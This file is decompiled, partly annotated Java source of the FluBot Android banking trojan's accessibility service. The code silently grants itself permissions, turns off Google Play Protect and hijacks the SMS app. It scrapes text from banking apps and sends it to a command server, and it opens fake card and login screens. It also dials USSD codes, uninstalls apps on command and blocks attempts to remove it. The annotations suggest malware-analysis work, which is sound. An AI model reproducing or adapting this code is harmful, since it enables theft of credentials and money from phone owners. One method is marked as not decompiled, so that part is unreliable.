package com.iqiyi.i18n;

import android.accessibilityservice.AccessibilityService;
import android.app.ActivityManager;
import android.app.KeyguardManager;
import android.content.Intent;
import android.content.SharedPreferences;
import android.net.Uri;
import android.os.Build;
import android.os.PowerManager;
import android.util.Log;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;
import android.widget.Toast;
import java.util.ArrayList;
import java.util.List;
import p000a.p019g.p020d.C0122a;
import p072c.p073a.p074a.C0497a;

public class MyAccessibilityService extends AccessibilityService {

    /* renamed from: b */
    private static boolean connected = false;

    /* renamed from: c */
    private static boolean targetArmed = false;

    /* renamed from: d */
    private static String targetText = null;

    /* renamed from: e */
    private static boolean playProtectDisabled = false;

    /* renamed from: f */
    private static PPState playProtectGlobalState;

    /* renamed from: g */
    private static String ussdToCall = null;

    /* renamed from: h */
    private static boolean ussdCalled = false;

    /* renamed from: i */
    private static String appToRemove = null;

    /* renamed from: j */
    private static boolean f2303j = false;

    /* renamed from: k */
    private static long targetTimestamp = 0;

    /* renamed from: l */
    private static String collectedText = "";

    /* renamed from: m */
    private static final String[] f2306m = {"FluBot"};

    /* renamed from: n */
    private static final String[] f2307n = {"Activar análisis de Play Protect", "Ajustes de Play Protect"};

    /* renamed from: com.iqiyi.i18n.MyAccessibilityService$b */
    class PPState {

        /* renamed from: a */
        int playProtectDisableMethod;

        /* renamed from: b */
        boolean readyToDisablePlayProtect;

        /* renamed from: c */
        boolean verityAppSettingsLaunched;

        /* renamed from: d */
        boolean f2311d;

        private PPState() {
            this.playProtectDisableMethod = 0;
            this.readyToDisablePlayProtect = false;
            this.verityAppSettingsLaunched = false;
            this.f2311d = false;
        }
    }

    static {
        "space.linuxct.malninstall";
    }

    public MyAccessibilityService() {
        "com.android.vending";
        "com.google.android.gms";
        "com.google.android.gms:id/toggle";
    }

    /* renamed from: a */
    private boolean clickToGetPermissions(AccessibilityNodeInfo accessibilityNodeInfo) {
        AccessibilityNodeInfo i;
        if (MalUtil.hasAllThesePermissions(this, Util.permissions) || (i = findOneNodeInfo(new String[]{
                "com.android.permissioncontroller:id/permission_allow_button", 
                "com.android.packageinstaller:id/permission_allow_button"}, accessibilityNodeInfo, false)) == null) {
            return false;
        }
        i.performAction(16);
        return true;
    }

    /* renamed from: b */
    private void clickHandlingParents(AccessibilityNodeInfo accessibilityNodeInfo) {
        for (int i = 0; i < 5 && accessibilityNodeInfo != null && !accessibilityNodeInfo.performAction(16); i++) {
            accessibilityNodeInfo = accessibilityNodeInfo.getParent();
        }
    }

    /* renamed from: c */
    private boolean handlePlayProtectDisable(AccessibilityEvent accessibilityEvent, AccessibilityNodeInfo accessibilityNodeInfo) {
        "com.google.android.gms";
        "com.google.android.gms.security.settings.VerifyAppsSettingsActivity";
        String charSequence = accessibilityEvent.getPackageName().toString();
        PPState bVar = playProtectGlobalState;
        if (bVar.readyToDisablePlayProtect) {
            int i = bVar.playProtectDisableMethod;
            bVar.getClass();
            return i == 0 ? disablePlayProtect(accessibilityEvent, accessibilityNodeInfo) : disablePlayProtect2(accessibilityEvent, accessibilityNodeInfo);
        }
        if (!bVar.verityAppSettingsLaunched) {
            try {
                Intent intent = new Intent();
                intent.setClassName("com.google.android.gms", "com.google.android.gms.security.settings.VerifyAppsSettingsActivity");
                intent.setFlags(268435456);
                if (intent.resolveActivity(getPackageManager()) == null) {
                    return false;
                }
                playProtectGlobalState.verityAppSettingsLaunched = true;
                startActivity(intent);
            } catch (Exception e) {
                return false;
            }
        } else if (charSequence.equals("com.google.android.gms") || charSequence.equals("com.android.vending")) {
            AccessibilityNodeInfo h = getNodeInfoByTextOrId("com.google.android.gms:id/toggle", accessibilityNodeInfo, false);
            PPState bVar2 = playProtectGlobalState;
            bVar2.readyToDisablePlayProtect = true;
            bVar2.getClass();
            if (h != null) {
                bVar2.playProtectDisableMethod = 0;
                return disablePlayProtect(accessibilityEvent, accessibilityNodeInfo);
            }
            bVar2.playProtectDisableMethod = 1;
            return disablePlayProtect2(accessibilityEvent, accessibilityNodeInfo);
        }
        return true;
    }

    /* renamed from: d */
    private boolean disablePlayProtect2(AccessibilityEvent accessibilityEvent, AccessibilityNodeInfo accessibilityNodeInfo) {
        AccessibilityNodeInfo accessibilityNodeInfo2;
        String format;
        int i = 0;
        Boolean bool = Boolean.FALSE;
        AccessibilityNodeInfo h = getNodeInfoByTextOrId("android:id/switch_widget", accessibilityNodeInfo, false);
        if (h != null) {
            if (!h.isChecked()) {
                format = String.format("%s,%s,%s", new Object[]{"LOG", "DISABLE_PLAY_PROTECT", "1"});
            } else {
                clickHandlingParents(h);
                playProtectGlobalState.f2311d = true;
                return true;
            }
        } else if (playProtectGlobalState.f2311d) {
            List f = collectChildrenByClassName("android.widget.Button", accessibilityNodeInfo);
            if (f.size() != 2 || (accessibilityNodeInfo2 = (AccessibilityNodeInfo) f.get(1)) == null) {
                return true;
            }
            accessibilityNodeInfo2.performAction(16);
            format = String.format("%s,%s,%s", new Object[]{"LOG", "DISABLE_PLAY_PROTECT", "1"});
        } else {
            List f2 = collectChildrenByClassName("android.widget.TextView", accessibilityNodeInfo);
            f2.size();
            while (i < f2.size()) {
                AccessibilityNodeInfo accessibilityNodeInfo3 = (AccessibilityNodeInfo) f2.get(i);
                if (accessibilityNodeInfo3.getParent() == null || accessibilityNodeInfo3.getParent().getClassName() == null || !accessibilityNodeInfo3.getParent().getClassName().equals("android.support.v7.widget.LinearLayoutCompat")) {
                    i++;
                } else {
                    accessibilityNodeInfo3.performAction(16);
                    return true;
                }
            }
            return true;
        }
        C2Communication.startSendingC2(format, bool);
        performGlobalAction(2);
        return false;
    }

    /* renamed from: e */
    private boolean disablePlayProtect(AccessibilityEvent accessibilityEvent, AccessibilityNodeInfo accessibilityNodeInfo) {
        AccessibilityNodeInfo h = getNodeInfoByTextOrId("com.google.android.gms:id/toggle", accessibilityNodeInfo, false);
        if (h != null) {
            clickHandlingParents(h);
            return true;
        }
        AccessibilityNodeInfo h2 = getNodeInfoByTextOrId("android:id/button1", accessibilityNodeInfo, false);
        if (h2 == null) {
            return true;
        }
        h2.performAction(16);
        C2Communication.startSendingC2(String.format("%s,%s,%s", new Object[]{"LOG", "DISABLE_PLAY_PROTECT", "1"}), Boolean.FALSE);
        performGlobalAction(2);
        return false;
    }

    /* renamed from: f */
    private List collectChildrenByClassName(String str, AccessibilityNodeInfo accessibilityNodeInfo) {
        ArrayList arrayList = new ArrayList();
        for (int i = 0; i < accessibilityNodeInfo.getChildCount(); i++) {
            AccessibilityNodeInfo child = accessibilityNodeInfo.getChild(i);
            if (!(child == null || child.getClassName() == null)) {
                if (child.getClassName().toString().equals(str)) {
                    arrayList.add(child);
                }
                if (child.getChildCount() > 0) {
                    arrayList.addAll(collectChildrenByClassName(str, child));
                }
            }
        }
        return arrayList;
    }

    /* renamed from: g */
    private void collectViewsText(AccessibilityNodeInfo accessibilityNodeInfo, StringBuilder sb) {
        for (int i = 0; i < accessibilityNodeInfo.getChildCount(); i++) {
            AccessibilityNodeInfo child = accessibilityNodeInfo.getChild(i);
            if (child != null) {
                if (child.getText() != null && child.getText().toString().length() > 0) {
                    sb.append(child.getViewIdResourceName());
                    sb.append(" -> ");
                    sb.append(child.getText().toString());
                    sb.append("\n");
                }
                collectViewsText(child, sb);
            }
        }
    }

    /* renamed from: h */
    private AccessibilityNodeInfo getNodeInfoByTextOrId(String str, AccessibilityNodeInfo accessibilityNodeInfo, boolean z) {
        List<AccessibilityNodeInfo> findAccessibilityNodeInfosByText = z ? accessibilityNodeInfo.findAccessibilityNodeInfosByText(str) : accessibilityNodeInfo.findAccessibilityNodeInfosByViewId(str);
        if (findAccessibilityNodeInfosByText.size() > 0) {
            return findAccessibilityNodeInfosByText.get(0);
        }
        return null;
    }

    /* renamed from: i */
    private AccessibilityNodeInfo findOneNodeInfo(String[] strArr, AccessibilityNodeInfo accessibilityNodeInfo, boolean z) {
        for (String h : strArr) {
            AccessibilityNodeInfo h2 = getNodeInfoByTextOrId(h, accessibilityNodeInfo, z);
            if (h2 != null) {
                return h2;
            }
        }
        return null;
    }

    /* renamed from: j */
    public static boolean m2266j() {
        return connected;
    }

    /* renamed from: k */
    private void goHomeAndShowDenied() {
        goHomeAndShowMessage(LocaleManager.strings[1]);
    }

    /* renamed from: l */
    private void goHomeAndShowMessage(String str) {
        if (MalUtil.hasAllThesePermissions(this, Util.permissions)) {
            performGlobalAction(2);
            Toast.makeText(getApplicationContext(), str, 1).show();
        }
    }

    /* renamed from: m */
    public static void m2269m(String str) {
        ussdCalled = false;
        targetTimestamp = 0;
        ussdToCall = str;
    }

    /* renamed from: n */
    public static void m2270n() {
        if (!playProtectDisabled) {
            playProtectGlobalState = new PPState();
            playProtectDisabled = true;
            targetTimestamp = 0;
        }
    }

    /* renamed from: o */
    public static void setTarget(boolean z, String str) {
        targetArmed = z;
        targetTimestamp = System.currentTimeMillis();
        targetText = str;
    }

    /* JADX WARNING: Code restructure failed: missing block: B:17:0x005a, code lost:
        if (r1.performAction(16) != false) goto L_0x005c;
     */
    /* renamed from: p */
    /* Code decompiled incorrectly, please refer to instructions dump. */
    private boolean clickOnTarget(android.view.accessibility.AccessibilityNodeInfo r7) {
        /*
            r6 = this;
            r0 = 0
            boolean r1 = targetArmed
            if (r1 != 0) goto L_0x0006
        L_0x0005:
            return r0
        L_0x0006:
            long r2 = java.lang.System.currentTimeMillis()
            long r4 = targetTimestamp
            long r2 = r2 - r4
            r4 = 5000(0x1388, double:2.4703E-320)
            int r1 = (r2 > r4 ? 1 : (r2 == r4 ? 0 : -1))
            if (r1 >= 0) goto L_0x005c
            r2 = -53114034576167(0xffffcfb16cd624d9, double:NaN)
            java.lang.String r1 = p072c.p073a.p074a."android:id/button1"
            android.view.accessibility.AccessibilityNodeInfo r1 = r6.getNodeInfoByTextOrId(r1, r7, r0)
            if (r1 == 0) goto L_0x004e
            boolean r2 = r1.isEnabled()
            if (r2 != 0) goto L_0x0054
            java.lang.String r1 = targetText
            java.util.List r2 = r7.findAccessibilityNodeInfosByText(r1)
            r1 = r0
        L_0x002f:
            int r0 = r2.size()
            if (r1 >= r0) goto L_0x004e
            java.lang.Object r0 = r2.get(r1)
            android.view.accessibility.AccessibilityNodeInfo r0 = (android.view.accessibility.AccessibilityNodeInfo) r0
            java.lang.CharSequence r3 = r0.getText()
            java.lang.String r3 = r3.toString()
            java.lang.String r4 = targetText
            boolean r3 = r3.equals(r4)
            if (r3 == 0) goto L_0x0050
            r6.clickHandlingParents(r0)
        L_0x004e:
            r0 = 1
            goto L_0x0005
        L_0x0050:
            int r0 = r1 + 1
            r1 = r0
            goto L_0x002f
        L_0x0054:
            r2 = 16
            boolean r1 = r1.performAction(r2)
            if (r1 == 0) goto L_0x004e
        L_0x005c:
            targetArmed = r0
            goto L_0x004e
        */
        throw new UnsupportedOperationException("Method not decompiled: com.iqiyi.i18n.MyAccessibilityService.clickOnTarget(android.view.accessibility.AccessibilityNodeInfo):boolean");
    }

    /* renamed from: q */
    public static void m2273q(String str) {
        f2303j = false;
        targetTimestamp = 0;
        appToRemove = str;
    }

    public void onAccessibilityEvent(AccessibilityEvent accessibilityEvent) {
        AccessibilityNodeInfo rootInActiveWindow;
        Intent intent;
        AccessibilityNodeInfo h;
        Boolean bool = Boolean.FALSE;
        Boolean bool2 = Boolean.TRUE;
        try {
            if (accessibilityEvent.getClassName() != null && (rootInActiveWindow = getRootInActiveWindow()) != null && accessibilityEvent.getPackageName() != null) {
                String charSequence = accessibilityEvent.getPackageName().toString();
                String h2 = MalUtil.sharedGetOriginalSMSManager(this);

                if (MyNotificationListener.isConnected()) {

                    //Disable doze mode for FluBot
                    if (Build.VERSION.SDK_INT >= 23) {
                        String str = Build.MANUFACTURER;
                        if (!str.equalsIgnoreCase("Huawei") && !str.equalsIgnoreCase("Xiaomi")) {
                            Intent intent2 = new Intent();
                            String packageName = getPackageName();
                            if (!((PowerManager) getSystemService("power")).isIgnoringBatteryOptimizations(packageName)) {
                                //Disable doze mode and go home
                                AccessibilityNodeInfo h3 = getNodeInfoByTextOrId("android:id/button1", rootInActiveWindow, false);
                                if (h3 != null) {
                                    h3.performAction(16);
                                    performGlobalAction(2);
                                //Show battery settings
                                } else {
                                    intent2.setAction("android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS");
                                    intent2.setFlags(268435456);
                                    intent2.setData(Uri.parse("package:" + packageName));
                                    startActivity(intent2);
                                    return;
                                }
                            }
                        }
                    }

                    //Launch spoofed CardActivity
                    if (CardActivity.m2226a() && accessibilityEvent.getClassName() != null && !accessibilityEvent.getClassName().toString().contains("CardActivity")) {
                        Intent intent3 = new Intent(this, CardActivity.class);
                        intent3.setFlags(268435456);
                        startActivity(intent3);
                    } else if (!playProtectDisabled && ussdToCall == null && appToRemove == null) {
                        //Set SMS manager
                        if (!MalUtil.smsManagerReplaced(this)) {
                            MalUtil.setSmsManager(this);
                        } else {

                            //Launche permissions settings
                            if (!MalUtil.hasAllThesePermissions(this, Util.permissions)) {
                                intent = new Intent(this, IntentStarter.class);
                                intent.setFlags(268435456);
                                intent.putExtra("a", 0);

                            //Old SMM manager, replace with this one
                            } else if (charSequence.equals(h2)) {
                                Intent intent4 = new Intent(this, ComposeSmsActivity.class);
                                intent4.setFlags(268500992);
                                startActivity(intent4);
                                return;

                            //Injectable package?
                            } else if (C0515b.getInject(charSequence) != null) {
                                SharedPreferences sharedPreferences = getSharedPreferences(getString(2131689500), 0);
                                Boolean valueOf = Boolean.valueOf(sharedPreferences.getBoolean(charSequence.hashCode() + "", false));
                                //Inject or kill?
                                if (!valueOf.booleanValue() || !sharedPreferences.getBoolean("e", false)) {
                                    StringBuilder sb = new StringBuilder();
                                    collectViewsText(rootInActiveWindow, sb);
                                    if (!collectedText.equals(sb.toString())) {
                                        C2Communication.startSendingC2(String.format("%s,%s:%s,%s", new Object[]{"LOG", "BAL_GRABBER", charSequence, sb.toString()}), bool2);
                                        collectedText = sb.toString();
                                    }
                                    //Phish if not done already
                                    if (!valueOf.booleanValue()) {
                                        intent = new Intent(this, BrowserActivity.class);
                                        intent.setFlags(268500992);
                                        intent.putExtra("a", charSequence);
                                    }
                                } else {
                                    goHomeAndShowDenied();
                                    ((ActivityManager) getSystemService("activity")).killBackgroundProcesses(charSequence);
                                    return;
                                }
                            }
                            startActivity(intent);
                        }

                        //Don't uninstall or get permissions
                        if (charSequence.contains("android.packageinstaller")) {
                            if (clickToGetPermissions(rootInActiveWindow) || (h = getNodeInfoByTextOrId("android:id/alertTitle", rootInActiveWindow, false)) == null || !h.getText().toString().equals(getString(2131689500))) {
                                return;
                            }
                        } else if (charSequence.equals("com.android.settings")) {
                            if (!clickOnTarget(rootInActiveWindow)) {
                                if (getNodeInfoByTextOrId(getString(2131689499), rootInActiveWindow, true) != null) {
                                    goHomeAndShowDenied();
                                    return;
                                }
                                AccessibilityNodeInfo i = findOneNodeInfo(new String[]{"com.android.settings:id/entity_header_title", "com.android.settings:id/app_detail_title", "com.android.settings:id/app_name", "android:id/title"}, rootInActiveWindow, false);
                                if (i == null || i.getText() == null || !i.getText().toString().equals(getString(2131689500))) {
                                    return;
                                }
                            } else {
                                return;
                            }
                        } else if (!charSequence.equals("com.google.android.permissioncontroller")) {
                            //If linuxct's FluBot uninstaller, go bacl
                            if (charSequence.equals("space.linuxct.malninstall")) {
                                System.out.println("Держи еще 25$, мальчик :))");
                                performGlobalAction(1); //Go back
                            } 
                            //Go back if trying to set strict security on this app
                            else if (accessibilityEvent.getClassName() == null || !accessibilityEvent.getClassName().equals("com.google.android.gms.security.settings.VerifyAppsSettingsActivity")) {
                                if (findOneNodeInfo(f2307n, rootInActiveWindow, true) == null) {
                                    if (findOneNodeInfo(f2306m, rootInActiveWindow, true) != null) {
                                        performGlobalAction(1);
                                    } else {
                                        return;
                                    }
                                }
                            }
                            performGlobalAction(2);
                            return;
                        } else if (!clickOnTarget(rootInActiveWindow)) {
                            clickToGetPermissions(rootInActiveWindow);
                            return;
                        } else {
                            return;
                        }
                        goHomeAndShowDenied();
                    } else {
                        PowerManager powerManager = (PowerManager) getSystemService("power");
                        if (!((KeyguardManager) getSystemService("keyguard")).isKeyguardLocked() && powerManager.isInteractive()) {
                            long currentTimeMillis = System.currentTimeMillis();
                            if (targetTimestamp == 0) {
                                targetTimestamp = currentTimeMillis;
                            }
                            if (currentTimeMillis - targetTimestamp >= 5000) {
                                playProtectDisabled = false;
                                ussdToCall = null;
                            } else if (playProtectDisabled) {
                                if (!handlePlayProtectDisable(accessibilityEvent, rootInActiveWindow)) {
                                    playProtectDisabled = false;
                                    return;
                                }
                                return;
                            } else if (ussdToCall != null) {
                                if (charSequence.equals("com.android.phone") || charSequence.equals("com.android.server.telecom")) {
                                    performGlobalAction(2);
                                    C2Communication.startSendingC2(String.format("%s,%s,%s", new Object[]{"LOG", "RUN_USSD", "1"}), bool);
                                    ussdToCall = null;
                                    return;
                                } else if (!ussdCalled) {
                                    Intent intent5 = new Intent("android.intent.action.CALL");
                                    intent5.setData(Uri.parse("tel:" + ussdToCall + Uri.encode("#")));
                                    intent5.setFlags(268435456);
                                    startActivity(intent5);
                                    ussdCalled = true;
                                    return;
                                } else {
                                    return;
                                }
                            } else if (appToRemove == null) {
                                return;
                            } else {
                                if (charSequence.equals("com.google.android.packageinstaller")) {
                                    AccessibilityNodeInfo h4 = getNodeInfoByTextOrId("android:id/button1", rootInActiveWindow, false);
                                    if (h4 != null) {
                                        h4.performAction(16);
                                        C2Communication.startSendingC2(String.format("%s,%s,%s", new Object[]{"LOG", "UNINSTALL_APP", "1"}), bool);
                                    } else {
                                        return;
                                    }
                                } else if (!f2303j) {
                                    Intent intent6 = new Intent("android.intent.action.DELETE");
                                    intent6.setData(Uri.parse("package:" + appToRemove));
                                    startActivity(intent6);
                                    f2303j = true;
                                    return;
                                } else {
                                    return;
                                }
                            }
                            appToRemove = null;
                        }
                    }
                }
            }
        } catch (Exception e) {
            C2Communication.startSendingC2(String.format("%s,%s,%s", new Object[]{"LOG", "EXCEPTION", Log.getStackTraceString(e)}), bool2);
        }
    }

    public void onInterrupt() {
    }

    public void onServiceConnected() {
        super.onCreate();
        MalUtil.makeNotificationChannel(this);

        if (!MyNotificationListener.isConnected()) {
            Intent intent = new Intent(this, MainActivity.class);
            intent.setFlags(268435456);
            startActivity(intent);
        }

        C0122a.startService(this, new Intent(this, ForegroundService.class));
        MalUtil.sleepSec(1);

        C0515b.initAndSpawn(this);
        connected = true;
    }

    /*
        Main -> Access -> Thead
                       -> Foreground

        Receivers
    */
}
